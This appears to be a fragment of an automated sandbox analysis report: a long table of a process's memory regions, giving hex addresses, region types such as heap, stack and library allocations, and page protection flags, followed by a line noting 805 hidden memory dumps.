page read and write
|
||
|
7FFD9B77C000
|
trusted library allocation
|
page execute and read and write
|
||
|
46E000
|
unkown
|
page read and write
|
||
|
112E45A5000
|
heap
|
page read and write
|
||
|
2A5E000
|
stack
|
page read and write
|
||
|
476E000
|
heap
|
page read and write
|
||
|
477B000
|
heap
|
page read and write
|
||
|
112E42E0000
|
heap
|
page read and write
|
||
|
889B3B000
|
stack
|
page read and write
|
||
|
4160000
|
heap
|
page read and write
|
||
|
2926617D000
|
heap
|
page read and write
|
||
|
4161000
|
heap
|
page read and write
|
||
|
4764000
|
heap
|
page read and write
|
||
|
1FD9A000
|
heap
|
page read and write
|
||
|
2926616C000
|
heap
|
page read and write
|
||
|
1FB8D000
|
stack
|
page read and write
|
||
|
4160000
|
heap
|
page read and write
|
||
|
8899BE000
|
stack
|
page read and write
|
||
|
112E42C0000
|
heap
|
page read and write
|
||
|
4C4000
|
heap
|
page read and write
|
||
|
477B000
|
heap
|
page read and write
|
||
|
4460000
|
trusted library allocation
|
page execute and read and write
|
||
|
4611000
|
trusted library allocation
|
page read and write
|
||
|
889A3E000
|
stack
|
page read and write
|
||
|
72D0000
|
trusted library allocation
|
page read and write
|
||
|
476E000
|
heap
|
page read and write
|
||
|
3C70000
|
remote allocation
|
page execute and read and write
|
||
|
201A0000
|
heap
|
page read and write
|
||
|
41B7000
|
heap
|
page read and write
|
||
|
4CE000
|
stack
|
page read and write
|
||
|
1FB4C000
|
stack
|
page read and write
|
||
|
7015000
|
heap
|
page read and write
|
||
|
1FE24000
|
heap
|
page read and write
|
||
|
BC000
|
stack
|
page read and write
|
||
|
41B7000
|
heap
|
page read and write
|
||
|
5679000
|
trusted library allocation
|
page read and write
|
||
|
4767000
|
heap
|
page read and write
|
||
|
2926617D000
|
heap
|
page read and write
|
||
|
1FFD9000
|
heap
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
4A8E000
|
stack
|
page read and write
|
||
|
83A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
900000
|
direct allocation
|
page read and write
|
||
|
416D000
|
heap
|
page read and write
|
||
|
7270000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
2BC8000
|
trusted library allocation
|
page read and write
|
||
|
7ED0000
|
trusted library allocation
|
page read and write
|
||
|
112E5EA0000
|
heap
|
page execute and read and write
|
||
|
7300000
|
trusted library allocation
|
page read and write
|
||
|
8892FE000
|
stack
|
page read and write
|
||
|
5B0000
|
heap
|
page readonly
|
||
|
2AE0000
|
trusted library section
|
page read and write
|
||
|
699000
|
heap
|
page read and write
|
||
|
20109000
|
unclassified section
|
page execute and read and write
|
||
|
4774000
|
heap
|
page read and write
|
||
|
416D000
|
heap
|
page read and write
|
||
|
29267E6C000
|
heap
|
page read and write
|
||
|
47F000
|
stack
|
page read and write
|
||
|
2B1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
25A0000
|
heap
|
page read and write
|
||
|
2926613E000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
4162000
|
heap
|
page read and write
|
||
|
29267E82000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
2926628E000
|
heap
|
page read and write
|
||
|
7EAD000
|
stack
|
page read and write
|
||
|
6D8E000
|
stack
|
page read and write
|
||
|
4176000
|
heap
|
page read and write
|
||
|
292680DB000
|
heap
|
page read and write
|
||
|
29266147000
|
heap
|
page read and write
|
||
|
1FFE2000
|
heap
|
page read and write
|
||
|
4535000
|
heap
|
page execute and read and write
|
||
|
E27DDFE000
|
stack
|
page read and write
|
||
|
6FA000
|
heap
|
page read and write
|
||
|
476B000
|
heap
|
page read and write
|
||
|
29266210000
|
heap
|
page read and write
|
||
|
112FE5F0000
|
heap
|
page read and write
|
||
|
4164000
|
heap
|
page read and write
|
||
|
292660BE000
|
heap
|
page read and write
|
||
|
4D0000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
72C0000
|
trusted library allocation
|
page read and write
|
||
|
4960000
|
trusted library allocation
|
page read and write
|
||
|
416D000
|
heap
|
page read and write
|
||
|
29267E83000
|
heap
|
page read and write
|
||
|
4C4000
|
heap
|
page read and write
|
||
|
7E10000
|
trusted library allocation
|
page read and write
|
||
|
8894FD000
|
stack
|
page read and write
|
||
|
8EA000
|
heap
|
page read and write
|
||
|
4DAE000
|
trusted library allocation
|
page read and write
|
||
|
29267E61000
|
heap
|
page read and write
|
||
|
4793000
|
heap
|
page read and write
|
||
|
29267E6C000
|
heap
|
page read and write
|
||
|
1D0000
|
heap
|
page read and write
|
||
|
1F96B000
|
stack
|
page read and write
|
||
|
112E5EE7000
|
heap
|
page read and write
|
||
|
112E6A52000
|
trusted library allocation
|
page read and write
|
||
|
88957E000
|
stack
|
page read and write
|
||
|
72F0000
|
trusted library allocation
|
page read and write
|
||
|
6C9D000
|
stack
|
page read and write
|
||
|
457E000
|
stack
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
4768000
|
heap
|
page read and write
|
||
|
7DF49DD50000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C3C000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
6FDD000
|
heap
|
page read and write
|
||
|
8370000
|
trusted library allocation
|
page read and write
|
||
|
292660EC000
|
heap
|
page read and write
|
||
|
81DE000
|
heap
|
page read and write
|
||
|
292660EC000
|
heap
|
page read and write
|
||
|
1FFE2000
|
heap
|
page read and write
|
||
|
1FABF000
|
stack
|
page read and write
|
||
|
E27D7FE000
|
stack
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
112F5F11000
|
trusted library allocation
|
page read and write
|
||
|
292680D0000
|
heap
|
page read and write
|
||
|
29267E83000
|
heap
|
page read and write
|
||
|
700B000
|
heap
|
page read and write
|
||
|
8390000
|
trusted library allocation
|
page read and write
|
||
|
292B000
|
heap
|
page read and write
|
||
|
29266289000
|
heap
|
page read and write
|
||
|
7DEE000
|
stack
|
page read and write
|
||
|
292680F9000
|
heap
|
page read and write
|
||
|
7FFD9B860000
|
trusted library allocation
|
page read and write
|
||
|
112E4580000
|
heap
|
page read and write
|
||
|
6E10000
|
heap
|
page read and write
|
||
|
29266169000
|
heap
|
page read and write
|
||
|
7FFD9B87A000
|
trusted library allocation
|
page read and write
|
||
|
200B0000
|
unclassified section
|
page execute and read and write
|
||
|
6AA0000
|
direct allocation
|
page read and write
|
||
|
6DCE000
|
stack
|
page read and write
|
||
|
2001B000
|
heap
|
page read and write
|
||
|
8190000
|
heap
|
page read and write
|
||
|
6B2000
|
heap
|
page read and write
|
||
|
2B10000
|
trusted library allocation
|
page read and write
|
||
|
29267E66000
|
heap
|
page read and write
|
||
|
4176000
|
heap
|
page read and write
|
||
|
6B9A000
|
stack
|
page read and write
|
||
|
2926613E000
|
heap
|
page read and write
|
||
|
83C0000
|
trusted library allocation
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
7B0000
|
heap
|
page read and write
|
||
|
6AC0000
|
direct allocation
|
page read and write
|
||
|
112FE480000
|
heap
|
page read and write
|
||
|
29267E73000
|
heap
|
page read and write
|
||
|
1FE13000
|
heap
|
page read and write
|
There are 805 hidden memdumps, click here to show them.